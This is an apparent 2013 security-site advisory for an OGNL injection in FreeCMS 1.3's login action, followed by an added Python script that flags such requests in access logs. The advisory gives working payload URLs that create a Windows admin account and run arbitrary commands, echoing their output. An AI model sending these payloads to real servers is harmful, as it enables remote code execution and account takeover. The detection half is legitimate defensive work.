FreeCms command execution (OGNL execution sequence bypass vulnerability, reference EXP)

2013-08-05T00:00:00
ID MYHACK58:62201340084
Type myhack58
Reporter 园长
Modified 2013-08-05T00:00:00

Description

Open source, free Java CMS - FreeCMS 1.3 - Data Objects - mail

Project address: https://code.google.com/p/freecms/

The tools for using the previously announced EXP do not work well, but the tool I released earlier can be used to execute commands and write a shell.

For the vulnerability description, see EXP3. To use it:

Find the login page: http://localhost:8080/ff/login.jsp

Get the form parameters yourself from the page source, or extract them automatically with the tool mentioned above.

Then modify the submit action: http://localhost:8080/ff/login_login.do?user.loginname=EXP

Selecting String as the request type is enough.

Add account: http://localhost:8080/ff/login_login.do?user.loginname=%28%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D+new+java.lang.Boolean%28false%29,%20%23_memberAccess[%22allowStaticMethodAccess%22]%3d+new+java.lang.Boolean%28true%29,%20@java.lang.Runtime@getRuntime%28%29.exec('net user admin admin /add%27%29%29%28meh%29&z[%28user.loginname%29%28%27meh%27%29]=true

Someone asked: command execution? Where? Oh, the change to the earlier EXP does not solve it:

http://localhost:8080/ff/login_login.do?user.loginname=(
%23context["xwork.MethodAccessor.denyMethodExecution"]= new java.lang.Boolean(false),
%23_memberAccess["allowStaticMethodAccess"]=new java.lang.Boolean(true),
%23req=@org.apache.struts2.ServletActionContext@getRequest(),
%23exec=@java.lang.Runtime@getRuntime().exec(%23req.getParameter(%22cmd%22)),
%23iswinreader=new java.io.DataInputStream(%23exec.getInputStream()),
%23buffer=new byte[1000],
%23iswinreader.readFully(%23buffer),
%23result=new java.lang.String(%23buffer),
%23response=@org.apache.struts2.ServletActionContext@getResponse(),
%23response.getWriter().println(%23result)
)
&z[(user.loginname)('meh')]=true&cmd=cmd /c set
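
For detection, the requests above leave two recognisable traces once the query string is URL-decoded: OGNL tokens such as #context and #_memberAccess in a parameter value, and a parameter name like z[(user.loginname)('meh')] that is an expression, not a property path. The following Python check is an added example, not part of the original advisory or of FreeCMS; the allowlist pattern for parameter names is an assumption, and the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# OGNL tokens that appear in the request strings shown on this page.
OGNL_TOKENS = (
    "#context", "#_memberAccess", "allowStaticMethodAccess",
    "xwork.MethodAccessor.denyMethodExecution",
    "@java.lang.Runtime@", "@org.apache.struts2.ServletActionContext@",
)
# Assumption: legitimate parameter names look like "user.loginname" or
# "items[0].name"; parentheses, quotes, '#' or '@' in a name are flagged.
SAFE_NAME = re.compile(r"^[A-Za-z_][\w.]*(\[\d+\][\w.]*)*$")
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def ognl_indicators(url):
    """Return sorted reasons why a request URL looks like OGNL injection."""
    reasons = set()
    # parse_qsl percent-decodes and maps '+' to space, so %23context -> #context.
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        if not SAFE_NAME.match(name):
            reasons.add("param-name:" + name)
        for token in OGNL_TOKENS:
            if token in name or token in value:
                reasons.add("token:" + token)
    return sorted(reasons)

def flag_log_lines(lines):
    """Yield (line_number, reasons) for access-log lines with indicators."""
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        reasons = ognl_indicators(match.group(1)) if match else []
        if reasons:
            yield number, reasons

# Constructed sample log (not from the page); the second request is an inert
# fragment of the page's string with no command in it.
SAMPLE_LOG = [
    '127.0.0.1 - - [05/Aug/2013:10:00:00 +0800] "GET /ff/login_login.do'
    '?user.loginname=alice HTTP/1.1" 200 512',
    '127.0.0.1 - - [05/Aug/2013:10:00:05 +0800] "GET /ff/login_login.do'
    '?user.loginname=%28%23context[%22xwork.MethodAccessor.denyMethodExecution'
    '%22]%3D+new+java.lang.Boolean%28false%29%29%28meh%29'
    '&z[%28user.loginname%29%28%27meh%27%29]=true HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for number, reasons in flag_log_lines(SAMPLE_LOG):
        print(number, reasons)
```

Access logs only record the query string, so parameters submitted in a POST body need the same check applied where the body is available, for example in a servlet filter or WAF rule.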